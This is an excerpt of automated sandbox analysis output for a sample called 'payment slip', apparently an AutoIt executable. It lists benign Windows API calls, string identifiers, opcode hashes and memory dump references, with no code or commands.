                                        • Opcode ID: de77d74c7984bc6aca7a07eef5bb411ca5111e8623c4479b01f10ca866db0105
                                        • Instruction ID: 3b27576b14f78e0f7ea44391f1608fb3c9943448e4be2b3b7cbb4f61e83f0724
                                        • Opcode Fuzzy Hash: de77d74c7984bc6aca7a07eef5bb411ca5111e8623c4479b01f10ca866db0105
                                        • Instruction Fuzzy Hash: 5701C032A145268ACF21AFBDDC819BF77E9EB61710B510538F86296191EA32E940E650
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-2399391058
                                        • Opcode ID: 040ae19cebc0dd5caf92899468f7c9b7cdcf338b2f4bb8147dcaa749bf4a1b12
                                        • Instruction ID: e946a91079054f5af61beaba6b22d80042b687e9fded2fddffe453071d984062
                                        • Opcode Fuzzy Hash: 040ae19cebc0dd5caf92899468f7c9b7cdcf338b2f4bb8147dcaa749bf4a1b12
                                        • Instruction Fuzzy Hash: 12113D35604604EFDB20DF19D850EA5B7E6FB89320F248269F9698B2A0C771E981CF90
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00091D4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 48f218fa25d449ed4532bfbc120b3dc4965ff7e1b18355c8f16e913e09ca4b1c
                                        • Instruction ID: c5d131cb4e1bd06b404a3620ea32c8502a6d0760f134e6c88d4b5b614eeca96a
                                        • Opcode Fuzzy Hash: 48f218fa25d449ed4532bfbc120b3dc4965ff7e1b18355c8f16e913e09ca4b1c
                                        • Instruction Fuzzy Hash: E901D471702219AB8F19EBA4CD55CFE77A8EF46390F040619F922672D2EA705908E760
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00091C46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 589fb9dffdfdc2d786bdfc869bf3e884206bd05c6df5a52da9b07bd7e0c8d225
                                        • Instruction ID: c3f19aea89b4fa0db0f60621f082e408bfed9b825b981aef5d9d50f1dc6043df
                                        • Opcode Fuzzy Hash: 589fb9dffdfdc2d786bdfc869bf3e884206bd05c6df5a52da9b07bd7e0c8d225
                                        • Instruction Fuzzy Hash: D901A2B5B851096ADF15EBA0CE52EFF77EC9F51340F140019B916672C2EA70AE08E7B1
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00091CC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 40a01bef9b7892c75215fe1a631b1331f61fffc883e99efc507f1d93da88f491
                                        • Instruction ID: 024ce599bdb4089758a28438e3e6c3f54b5be5e5851129f8ce2c4d47d48dbf05
                                        • Opcode Fuzzy Hash: 40a01bef9b7892c75215fe1a631b1331f61fffc883e99efc507f1d93da88f491
                                        • Instruction Fuzzy Hash: 6E01ADB5B8011966DF15EBA0CA02EFE77EC9B11340F540025B906B72C2EAA09F08E6B1
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0008769C,?,?,?), ref: 000C9111
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 000C90F7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageProcSend
                                        • String ID: U
                                        • API String ID: 982171247-2399391058
                                        • Opcode ID: 6259837a0159342dab81c282185acd48619630109b5ef90bffda297f264870ae
                                        • Instruction ID: d1b8728a5d8dcf904e89183555395bf1c0314233c71c75b053b3013b66d8fa69
                                        • Opcode Fuzzy Hash: 6259837a0159342dab81c282185acd48619630109b5ef90bffda297f264870ae
                                        • Instruction Fuzzy Hash: 0401BC30100204BBEB219F14DC4AFAA3BA6FB85765F14006CFA551A2E1CB726C91CB50
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: 3, 3, 16, 1
                                        • API String ID: 176396367-3042988571
                                        • Opcode ID: c35fd5f5c7995c3d12355b921b6813d8bfa43cad6b122f65076cce418de50b87
                                        • Instruction ID: efb95153b906ceb65668031241f52209e4d6d6e094c974f2140b0704b9824aca
                                        • Opcode Fuzzy Hash: c35fd5f5c7995c3d12355b921b6813d8bfa43cad6b122f65076cce418de50b87
                                        • Instruction Fuzzy Hash: 8FE09B1661522024927112799CC29FF56C9DFC5752714182BFE89C2267EB94CDD193A1
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00090B23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Message
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 2030045667-4017498283
                                        • Opcode ID: 20c675d8cc4e99df4b6e7deba9e684b7be573669bdb059cf62df470cc2bec88a
                                        • Instruction ID: 4b7310273797221a175f82a3283486e221c52265c20df2247daa419c19667d45
                                        • Opcode Fuzzy Hash: 20c675d8cc4e99df4b6e7deba9e684b7be573669bdb059cf62df470cc2bec88a
                                        • Instruction Fuzzy Hash: 15E0D8312483083AE2143754BC03FDD7A84CF05B15F10442AFB8C598C38AE2249056AD
                                        APIs
                                          • Part of subcall function 0004F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00050D71,?,?,?,0003100A), ref: 0004F7CE
                                        • IsDebuggerPresent.KERNEL32(?,?,?,0003100A), ref: 00050D75
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0003100A), ref: 00050D84
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00050D7F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 55579361-631824599
                                        • Opcode ID: 2b398439e69c63e2cf5cbc42238a085ce2bb70c51b2814f23a289d18c440b823
                                        • Instruction ID: 2043778dbd4ae73c1cbb23d61b3e0be130f6dfa3a1c594e5f4f39979ad2d11f0
                                        • Opcode Fuzzy Hash: 2b398439e69c63e2cf5cbc42238a085ce2bb70c51b2814f23a289d18c440b823
                                        • Instruction Fuzzy Hash: 97E012742007528BE3749FB8D504B9B7BF5BF04745F048D2DE886C7652DBB9E4488BA1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: %.3d$X64
                                        • API String ID: 481472006-1077770165
                                        • Opcode ID: 731ea787c32072eb7b3695a831c4b87af54123d9eda305c5caeb2e06b514742e
                                        • Instruction ID: d7a5d76dcd4e4438d37f64d2fadd7cce224b589ce0241ed945bd575da81bb041
                                        • Opcode Fuzzy Hash: 731ea787c32072eb7b3695a831c4b87af54123d9eda305c5caeb2e06b514742e
                                        • Instruction Fuzzy Hash: 62D012A1808119F9CB60A7D0DC49DBDB37CFB28301F508563F94A92080D624C5086765
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000C232C
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000C233F
                                          • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: f4d484bb4074074be37f43bb75f0d8dbcb2bb621243f99d7f09fbe64c554d300
                                        • Instruction ID: b366250a1b7fd531f4fe5c66ca88db9566a9639d639d933fcfc90b11031d30e5
                                        • Opcode Fuzzy Hash: f4d484bb4074074be37f43bb75f0d8dbcb2bb621243f99d7f09fbe64c554d300
                                        • Instruction Fuzzy Hash: 7AD01236794350B7F664B771DC0FFD67A149B00B14F004916B74AEA1D1C9F9A841DB54
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000C236C
                                        • PostMessageW.USER32(00000000), ref: 000C2373
                                          • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 47b3e9cc65be3afa2437a9568e355ce682ac7adf04a40da2e80ffb7438ea8e69
                                        • Instruction ID: 78ddd81c65cbb5c419173e7460aa116da7a6d74a226305ad84585e3891810fbd
                                        • Opcode Fuzzy Hash: 47b3e9cc65be3afa2437a9568e355ce682ac7adf04a40da2e80ffb7438ea8e69
                                        • Instruction Fuzzy Hash: 58D0C9327953507AF664B771DC0FFC676149B04B14F004916B74AEA1D1C9B9A8419A54